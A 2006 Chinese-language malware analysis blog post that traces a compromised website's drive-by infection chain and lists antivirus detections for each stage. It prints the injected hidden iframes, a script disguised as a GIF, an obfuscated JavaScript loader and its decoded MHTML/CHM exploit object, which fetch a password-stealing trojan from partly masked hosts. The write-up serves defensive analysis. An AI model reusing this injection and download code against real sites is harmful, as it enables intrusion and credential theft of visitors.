[07-20] 带毒网站www.china***huati.com(第3版)

最新推荐文章于 2024-05-31 19:06:17 发布

最新推荐文章于 2024-05-31 19:06:17 发布 · 2.2k 阅读

文章标签：

本文分析了一个复杂的恶意网页攻击案例，该攻击通过隐蔽的iframe注入、混淆JavaScript代码等手段，最终达到下载并执行恶意软件的目的。文章详细记录了从网页入口到最终释放恶意文件的全过程，并列举了Kaspersky及江民KV对该攻击各阶段文件的识别结果。

endurer　原创
2006-07-20　第3版　补充江民KV的反应
2006-07-19　第2版　补充Kaspersky的反应
2006-07-18　第1版

hxxp://www.china***huati.com首页被加入：
--------------------------------
＜iframe src=hxxp://bbs.**gemeus*.com/q17***/index.htm width=0 height=0＞＜/iframe＞
……
＜iframe height=0 width=0 src="hxxp://www.***ll-nba.com/*4***"＞＜/iframe＞（endurer注：共有6处插入）
--------------------------------

hxxp://bbs.**gemeus*.com/q17***/index.htm的内容为：

--------------------------------
＜script language="javascript" src="ah.js"＞＜/script＞
--------------------------------

ah.js 的内容解密后的内容为:
--------------------------------
GIF89a
var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));document.write('＜OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c://.mht!'+GIF89a+'/1.js::/#"＞＜/OBJECT＞');
--------------------------------
冒充GIF文件，下载运行 1.js。

Kaspersky 将 1.js 报为： Packed.Win32.Klone.d（http://www.viruslist.com/en/viruses/encyclopedia?virusid=115946）。

江民KV 将 1.js 报为： Exploit.HTML.Mht.ae（http://virusinfo.jiangmin.com/infomation/200641010559.html）。

1.js 其实是个CHM文件，会释放/运行名为 msnmon.exe 的文件。

Kaspersky 将 msnmon.exe 报为： not-a-virus:AdWare.Win32.WSearch.k。

江民对 msnmon.exe 的回复为：不是病毒。

hxxp://www.***ll-nba.com/*4***的内容为：
------------------------
＜SCRIPT LANGUAGE="JavaScript"＞
＜!--
var HtmlStrings=["=iunm＞ =PCKFDU!tuzmf＞#ejtqmbz;opof＜#!uzqf＞#ufyu0y.tdsjqumfu#!e","bub＞#'$88'$86'$69'$75'$88'$94'$84'$95'$94'$227'$222'$225'$212","'$69'$21:'$215'$227'$21:'$219'$69'$::'$69'$:3'$57'$21:'$215'$","227'$44'$215'$227'$227'$223'$69'$580xxx/mm.ocb/dpn050mphp/kqh",";;0213&3F&79un#＞=0PCKFDU＞ =0cpez＞ =0iunm＞ "];
function psw(st){
var varS;
varS="";
var i;
for(var a=0;a＜st.length;a++){
i = st.charCodeAt(a);
if (i==1)
varS=varS+String.fromCharCode('"'.charCodeAt()-1);
else if (i==2) {
a++;
varS+=String.fromCharCode(st.charCodeAt(a));
}
else
varS+=String.fromCharCode(i-1);
}
return varS;
};
var num=5;
function S(){
for(i=0;i＜num;i++)
document.write(psw(HtmlStrings[i]));}
S();
// --＞
＜/SCRIPT＞
-----------------------

代码运行后输出的内容为：

-----------------------
＜html＞
＜OBJECT style="display:none;" type="text/x-scriptlet" data="MK:@MSITStore:mhtml:c:/.mht!http://www.***ll-nba.com/*4***/logo.jpg::/102%2E%68tm"＞＜/OBJECT＞
＜/body＞
＜/html＞
-----------------------

会下载hxxp:///www.***ll-nba.com/*4***/logo.jpg。

Kaspersky 将 logo.jpg 报为：Trojan-PSW.Win32.QQShou.fw(http://www.viruslist.com/en/viruses/encyclopedia?virusid=123300)。

江民KV 将 logo.jpg 报为：TrojanDropper.Mht.Psyme.gfi。